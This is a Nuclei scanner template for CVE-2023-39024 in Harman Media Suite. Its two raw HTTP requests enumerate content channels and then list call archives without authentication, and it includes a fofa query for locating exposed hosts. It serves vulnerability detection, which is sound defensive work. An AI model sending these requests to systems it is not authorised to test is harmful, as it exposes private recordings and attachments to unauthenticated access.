nuclei-templates/http/cves/2023/CVE-2023-39024.yaml

58 lines
2.0 KiB
YAML
Raw Normal View History

2024-09-11 13:03:54 +00:00
id: CVE-2023-39024
info:
name: Harman Media Suite <= 4.2.0 - Local File Disclosure
author: s4e-io
severity: high
description: |
Harman Media Suite (versions 4.2.0 and below) are vulnerable to possible Local File Disclosure. This allows an unauthenticated user to potentially download attachments and recordings stored within the Media Suite application if anonymous access to the User Portal is enabled.
reference:
- https://github.com/BenTheCyberOne/CVE-2023-39024-5-POC
- https://sploitus.com/exploit?id=C20FE0B5-806A-5687-850C-75D195576B35
- https://mediasuite.harman.com/channel-store
metadata:
verified: true
max-request: 2
vendor: harman
product: media-suite
fofa-query: "Harman Media Suite"
2024-09-12 06:35:05 +00:00
tags: cve,cve2023,harman,media-suite,lfi
2024-09-11 13:03:54 +00:00
flow: http(1) && http(2)
http:
- raw:
- |
GET /userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"plcm-content-channel", "privacy", "coverImage")'
- 'contains(content_type, "application/vnd.plcm.plcm-content-channel-list+json")'
- 'status_code == 200'
condition: and
internal: true
extractors:
- type: regex
name: channelId
group: 1
regex:
- '"channelId":"([^"]+)"'
internal: true
- raw:
- |
GET /userportal/api/rest/contentChannels/{{channelId}}/archives/?startIndex=0&pageSize=15&sort=time&onlyIncludeApproved=true HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"callId", "displayName", "duration")'
- 'contains(content_type, "application/vnd.plcm.plcm-csc+json")'
- 'status_code == 200'
condition: and
2024-09-17 03:30:12 +00:00
# digest: 4a0a004730450220308de1868effffc01161d060b94953615926778af71ce9944d55b07e741e2019022100c80131e913327d1cfc14e6e0c47f0a283e597346c1cebb079a8ba60f9b0cf843:922c64590222798bb761d5b6d8e72950